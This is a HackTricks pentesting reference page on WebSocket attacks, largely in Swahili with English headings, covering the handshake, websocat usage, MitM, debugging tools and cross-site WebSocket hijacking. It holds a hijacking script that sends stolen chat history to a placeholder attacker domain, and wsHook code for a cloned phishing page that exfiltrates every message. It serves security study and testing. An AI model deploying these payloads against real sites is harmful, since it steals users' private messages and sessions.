hacktricks/pentesting-web/websocket-attacks.md

WebSocket Attacks

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

What are WebSockets

WebSocket connections zinaundwa kupitia mkutano wa awali wa HTTP na zimeundwa kuwa za muda mrefu, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa muamala. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji muda mfupi wa kuchelewesha au mawasiliano yanayoanzishwa na seva, kama vile mitiririko ya data za kifedha za moja kwa moja.

Establishment of WebSocket Connections

Maelezo ya kina juu ya kuanzisha WebSocket connections yanaweza kupatikana hapa. Kwa muhtasari, WebSocket connections kwa kawaida huanzishwa kupitia JavaScript upande wa mteja kama inavyoonyeshwa hapa chini:

var ws = new WebSocket("wss://normal-website.com/ws");

The wss protocol inamaanisha muunganisho wa WebSocket ulio salama na TLS, wakati ws inaashiria muunganisho usio salama.

Wakati wa kuanzisha muunganisho, mkono wa handshake unafanywa kati ya kivinjari na seva kupitia HTTP. Mchakato wa handshake unahusisha kivinjari kutuma ombi na seva kujibu, kama inavyoonyeshwa katika mifano ifuatayo:

Kivinjari kinatuma ombi la handshake:

GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket

Majibu ya mkono wa seva:

HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=

The connection remains open for message exchange in both directions once established.

Key Points of the WebSocket Handshake:

• The Connection and Upgrade headers signal the initiation of a WebSocket handshake.
• The Sec-WebSocket-Version header indicates the desired WebSocket protocol version, usually 13.
• A Base64-encoded random value is sent in the Sec-WebSocket-Key header, ensuring each handshake is unique, which helps to prevent issues with caching proxies. This value is not for authentication but to confirm that the response is not generated by a misconfigured server or cache.
• The Sec-WebSocket-Accept header in the server's response is a hash of the Sec-WebSocket-Key, verifying the server's intention to open a WebSocket connection.

These features ensure the handshake process is secure and reliable, paving the way for efficient real-time communication.

Linux console

You can use websocat to establish a raw connection with a websocket.

websocat --insecure wss://10.10.10.10:8000 -v

Au kuunda seva ya websocat:

websocat -s 0.0.0.0:8000 #Listen in port 8000

MitM websocket connections

Ikiwa unapata kwamba wateja wameunganishwa na HTTP websocket kutoka kwenye mtandao wako wa ndani, unaweza kujaribu ARP Spoofing Attack ili kufanya shambulio la MitM kati ya mteja na seva.
Mara tu mteja anapojaribu kuungana, unaweza kutumia:

websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v

Websockets enumeration

Unaweza kutumia tool https://github.com/PalindromeLabs/STEWS kuvumbua, kutambua na kutafuta vulnerabilities zinazojulikana katika websockets kiotomatiki.

Websocket Debug tools

• Burp Suite inasaidia mawasiliano ya MitM websockets kwa njia inayofanana sana na inavyofanya kwa mawasiliano ya kawaida ya HTTP.
• socketsleuth Burp Suite extension itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora zaidi katika Burp kwa kupata history, kuweka interception rules, kutumia match and replace rules, kutumia Intruder na AutoRepeater.
• WSSiP: Fupi kwa "WebSocket/Socket.io Proxy", chombo hiki, kilichoandikwa kwa Node.js, kinatoa kiolesura cha mtumiaji ili kukamata, kuingilia, kutuma ujumbe wa kawaida na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva.
• wsrepl ni interactive websocket REPL iliyoundwa mahsusi kwa ajili ya pentesting. Inatoa kiolesura cha kuangalia ujumbe wa websocket unaoingia na kutuma mpya, kwa mfumo rahisi wa kutumia kwa kujiendesha mawasiliano haya.
• https://websocketking.com/ ni web ya kuwasiliana na tovuti nyingine kwa kutumia websockets.
• https://hoppscotch.io/realtime/websocket kati ya aina nyingine za mawasiliano/protocols, inatoa web ya kuwasiliana na tovuti nyingine kwa kutumia websockets.

Websocket Lab

Katika Burp-Suite-Extender-Montoya-Course una msimbo wa kuzindua tovuti kwa kutumia websockets na katika this post unaweza kupata maelezo.

Cross-site WebSocket hijacking (CSWSH)

Cross-site WebSocket hijacking, pia inajulikana kama cross-origin WebSocket hijacking, inatambulika kama kesi maalum ya Cross-Site Request Forgery (CSRF) inayohusisha WebSocket handshakes. Vulnerability hii inatokea wakati WebSocket handshakes zinathibitishwa pekee kupitia HTTP cookies bila CSRF tokens au hatua nyingine za usalama.

Wavamizi wanaweza kutumia hii kwa kuandaa ukurasa wa wavuti mbaya unaoanzisha muunganisho wa cross-site WebSocket kwa programu iliyo hatarini. Kwa hivyo, muunganisho huu unachukuliwa kama sehemu ya kikao cha mwathirika na programu, ikitumia ukosefu wa ulinzi wa CSRF katika mfumo wa usimamizi wa kikao.

Simple Attack

Kumbuka kwamba wakati wa kuanzisha muunganisho wa websocket cookie inatumwa kwa seva. Seva inaweza kuwa inaitumia kuhusisha kila mtumiaji maalum na websocket session yake kulingana na cookie iliyotumwa.

Kisha, ikiwa kwa mfano seva ya websocket inatuma tena historia ya mazungumzo ya mtumiaji ikiwa ujumbe na "READY" umetumwa, basi XSS rahisi inayounda muunganisho (cookie itatumwa kiotomatiki kuidhinisha mtumiaji mwathirika) ikiwasilisha "READY" itakuwa na uwezo wa kurejesha historia ya mazungumzo.

<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY"); //Send the message to retreive confidential information
}
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>

Cross Origin + Cookie with a different subdomain

Katika chapisho hili la blogu https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/ mshambuliaji alifanikiwa kutekeleza Javascript isiyo na mipaka katika subdomain ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa subdomain, cookie ilikuwa inatumwa, na kwa sababu Websocket haikukagua Origin ipasavyo, ilikuwa inawezekana kuwasiliana nayo na kuiba tokens kutoka kwake.

Stealing data from user

Nakili programu ya wavuti unayotaka kujifanya (faili za .html kwa mfano) na ndani ya script ambapo mawasiliano ya websocket yanafanyika ongeza hii code:

//This is the script tag to load the websocket hooker
<script src='wsHook.js'></script>

//These are the functions that are gonig to be executed before a message
//is sent by the client or received from the server
//These code must be between some <script> tags or inside a .js file
wsHook.before = function(data, url) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "client_msg?m="+data, true);
xhttp.send();
}
wsHook.after = function(messageEvent, url, wsObject) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "server_msg?m="+messageEvent.data, true);
xhttp.send();
return messageEvent;
}

Sasa pakua faili la wsHook.js kutoka https://github.com/skepticfx/wshook na uhifadhi ndani ya folda yenye faili za wavuti.
Kufichua programu ya wavuti na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe waliotuma na kupokea kupitia websocket:

sudo python3 -m http.server 80

Mashindano ya Mbio

Mashindano ya Mbio katika WebSockets pia ni jambo, angalia habari hii kujifunza zaidi.

Uthibitisho Mwingine

Kama Web Sockets ni mekanismu ya kutuma data kwa upande wa seva na upande wa mteja, kulingana na jinsi seva na mteja wanavyoshughulikia habari, Web Sockets zinaweza kutumika kutekeleza udhaifu mwingine kama XSS, SQLi au udhaifu mwingine wa kawaida wa wavuti kwa kutumia input ya mtumiaji kutoka kwa websocket.

WebSocket Smuggling

Udhaifu huu unaweza kukuruhusu kupita vizuizi vya proxies za nyuma kwa kuwafanya waamini kwamba mawasiliano ya websocket yameanzishwa (hata kama si kweli). Hii inaweza kumruhusu mshambuliaji kufikia mwisho uliofichwa. Kwa maelezo zaidi angalia ukurasa ufuatao:

{% content-ref url="h2c-smuggling.md" %} h2c-smuggling.md {% endcontent-ref %}

Marejeleo

• https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages

{% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

{% endhint %}